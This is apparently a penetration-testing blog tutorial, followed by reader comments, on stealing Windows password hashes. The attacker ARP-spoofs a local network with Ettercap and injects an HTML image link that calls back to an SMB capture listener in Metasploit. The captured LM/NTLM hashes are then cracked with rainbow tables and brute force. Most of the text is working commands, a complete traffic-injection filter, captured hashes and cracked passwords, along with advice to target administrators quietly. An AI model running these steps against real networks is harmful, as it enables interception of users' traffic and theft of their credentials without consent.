You can probably get by with leaving off that last part of the title and still succeed with this attack. Today we will be making a Password Pwn Stew. Add a little Ettercap (link), with a dash of Metasploit (link), a smidgen of password cracking with Rcrack (link) and Rainbowtables (link), and if required a pinch of Hashcat (link) to taste. You will have yourself some tasty pwnage.
Note, your mileage may vary with this stew. I’m not Martha Stewart. Also the stew analogy ends here 🙂
The latest version of Kali Linux includes the most current version of Ettercap (0.8.0). But if you like installing from scratch then see Compiling and Installing Ettercap.
The latest version of Kali Linux includes the most current version of Metasploit. But if you like installing from scratch then visit the Metasploit Github page on setting up the development environment. You only need to follow the sections titled Apt-Get Install, Getting Ruby, Working with Git (ignore the forking part), Bundle install, and Configure your database.
The latest version of Kali Linux includes the most current version of rcracki_mt. You could also follow this quick tutorial to get rcracki_mt binary. You will also need to download the HALMLMCHALL rainbowtables so visit that same tutorial.
The latest version of Kali Linux includes an outdated version of HashCat. HashCat is free but not open source. You can download the latest binary from http://hashcat.net/oclhashcat/. You will need to download current video drivers for this version of HashCat. The following commands will work for Ubuntu 13.10 with an Nvidia card.
sudo add-apt-repository ppa:xorg-edgers/ppa
sudo apt-get update
sudo apt-get install nvidia-331 nvidia-settings-331
Now we have all our ingredients. Sorry, promised the analogy would end.
Let’s Get To It!
What we will accomplish is the Address Resolution Protocol (ARP) spoofing of a local network segment, inject HTML traffic whenever a user surfs the Internet/Intranet, and force clients to request a Server Message Block (SMB) authentication back to a Metasploit listener that will force authentication with a known challenge request. With a known challenge, and if LanManager is still enabled in the environment (Windows XP clients) then a Rainbowtable can be used to identify the first 7 characters of the password. The remainder can be brute forced. If only NTLM or NTLMv2 is used you still have a hash that you can dictionary attack or bruteforce, preferably with a cracker that takes advantage of your graphics card i.e. oclHashCat.
Setting Up Metasploit SMB Server
# service smbd stop
smbd stop/waiting
# /opt/metasploit-framework/msfconsole
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john
JOHNPWFILE => /tmp/john
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) >
ARP Spoofing and Packet Filtering with Ettercap
Note that when conducting ARP spoofing you will negatively impact the network traffic if you just spoof every host. Make your attack targeted so it does not raise any red flags or effect network performance. While this is outside the scope of this article you may want to target the workstations of any Windows Administrators to obtain their hash…for obvious reasons.
Before we start Ettercap we need to construct a filter to parse the HTTP (port 80) traffic and inject a link back to our Metasploit listener. There are links at the bottom to the resources I used to create the filter and learn about how filtering works in Ettercap.
Open your favorite text editor and paste the code below.
# vim http-img.filter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<\/body", "<img src=\"\\\\<Metasploit_Listener_IP_Address>\\pixel.gif\"><\/body ");
msg("Filter Ran 4.\n");
}
Once the file is saved you will use an Ettercap command to convert the code into the binary Ettercap will understand.
# etterfilter http-img.filter -o http-img.ef
etterfilter 0.8.0 copyright 2001-2013 Ettercap Development Team
12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
Parsing source file 'http-img.filter' done.
Unfolding the meta-tree done.
Converting labels to real offsets done.
Writing output to 'http-img.ef' done.
-> Script encoded into 15 instructions.
Copy the binary to the Ettercap share folder.
#cp http-img.ef /usr/share/ettercap
(may be /usr/local/share/ettercap)
If you know your target you can start Ettercap from the command-line to begin sniffing, ARP Spoof, and filtering the traffic.
# ettercap -TqF http-img.ef -M arp:remote /<target_ip(s)>/<gatewayIP>/ -i eth0
If you prefer the GUI then follow the screenshots found here.
This screenshot shows Ettercap when the filter modifies the traffic. Below is an example capture of the SMB authentication in Metasploit
msf auxiliary(smb) > [*] SMB Captured - Fri Jan 17 22:14:51 -0500 2014
NTLMv2 Response Captured from 192.168.0.108:1282 - 192.168.0.108
USER:Owner DOMAIN:COMPUTER-2554 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled
NTHASH:09af7e143207525cfc17e4037a1f0a54 NT_CLIENT_CHALLENGE:0101000000000000205e4972fb13cf01547f10c301861ef800000000020000000000000000000000
The last step we need to accomplish is crack the hash obtained. The example above has LMHASHing disabled. For demonstration purposes we will utilize LM and NTLM hashes captured during an actual penetration test.
One of the Metasploit options we set was JOHNPWFILE. This saves all hashes obtained in the format John the Ripper uses to crack passwords. It is also the format used by oclHashCat. But before we use any offline bruteforce tools we will demonstrate cracking NetLM using the example below. The username and domain have been removed to protect the guilty.
Username::WINDOWSDOMAIN:<b>1d006cfe2f3a9f72</b>ce4894c546c4beea53032ef5db28da08:b528f7d46e130e678c2e65a656b76b685f8dad9152d02c3f:1122334455667788
We will use rcracki_mt and the HALFLMCHALL rainbowtable to crack the first 7 characters of the password. This requires the first 16 digits of the NetLM hash – 1d006cfe2f3a9f72
# cd ~/tools/rcracki_mt_0.7.0_linux_x86_64
~/tools/rcracki_mt_0.7.0_linux_x86_64# # ./rcracki_mt /media/edge/3TB/Passwords/Rainbow/HalfLM/*.rti -h 1d006cfe2f3a9f72
Using 1 threads for pre-calculation and false alarm checking...
Found 4 rainbowtable files...
halflmchall_alpha-numeric#1-7_0_2400x57648865_1122334455667788_distrrtgen[p][i]_0.rti
reading index... 13528977 bytes read, disk access time: 0.00 s
reading table... 461190920 bytes read, disk access time: 0.00 s
searching for 1 hash...
plaintext of 1d006cfe2f3a9f72 is GOOSE00
cryptanalysis time: 0.06 s
statistics
-------------------------------------------------------
plaintext found: 1 of 1(100.00%)
total disk access time: 0.00s
total cryptanalysis time: 0.06s
total pre-calculation time: 2.34s
total chain walk step: 2876401
total false alarm: 31
total chain walk step due to false alarm: 68140
result
-------------------------------------------------------
1d006cfe2f3a9f72 GOOSE00 hex:474f4f53453030
Now to bruteforce the remaining portion of the password using a Ruby script that comes with Metasploit.
# cd /opt/metasploit-framework/tools
/opt/metasploit-framework/tools# ruby halflm_second.rb -n 1d006cfe2f3a9f72ce4894c546c4beea53032ef5db28da08 -p GOOSE00[*] Trying one character...
[*] Trying two characters (eta: 12.858231544494629 seconds)...
[*] Cracked: GOOSE004#
Using the script to brute force up to 3 characters is about as far as you want to go with the halflm_second.rb script as you see in the example below. That is a ten character password which is not too shabby. As you see below a longer password will not be cracked in a reasonable amount of time. Especially if you are on a penetration test with a limited testing window.
Username2:WINDOWSDOMAIN:1c6e27fb87220408930041fca2d43260f3831c004b1486d8:eab0974cad5cf20ab14e0d264865973bbffc0e5ca4725e33:1122334455667788
/opt/metasploit-framework/tools# ruby halflm_second.rb -n 1c6e27fb87220408930041fca2d43260f3831c004b1486d8 -p RYANCHI
[*] Trying one character...
[*] Trying two characters (eta: 10.010079860687256 seconds)...
[*] Trying three characters (eta: 2292.3082880973816 seconds)...
[*] Trying four characters (eta: 524938.5979743004 seconds)...
An eleven (11) character password will take 6.075 days. I have no idea how long a 12 character password would take but know that it is exponentially longer and not even scripted into halflm_second.rb . So oclHashcat and GPU password cracking to the rescue!
To continue the saga visit this tutorial on using Hashcat to bruteforce the second half of the password.
Great sites to learn about Ettercap Filtering
http://www.irongeek.com/i.php?page=security/ettercapfilter
http://aerokid240.blogspot.com/2009/11/more-on-ettercap-plus-filter-examples.html
http://openmaniak.com/ettercap_filter.php
Just a small bug, you’re missing the last ‘}’ in the http-img.filter.
This is an awesome article, and I had a lot of fun playing around with it. I’ll be adding this technique to my pen testing toolbox for sure.
A few things, though. The use of embedded UNC references in HTML only works against IE and Edge (though quite successfully).
Also, you’ll want to make the UNC link to be as short as possible, and potentially move it to the beginning of the document, like so:
This is because you’re making the content longer than the Content-length: tag in the HTTP header. It seems that most browsers just discard anything after the end of the file if it’s longer than Content-length, meaning your injected img can get truncated. (It does have to remain a .gif file in an img tag, to get around Cross-origin restrictions).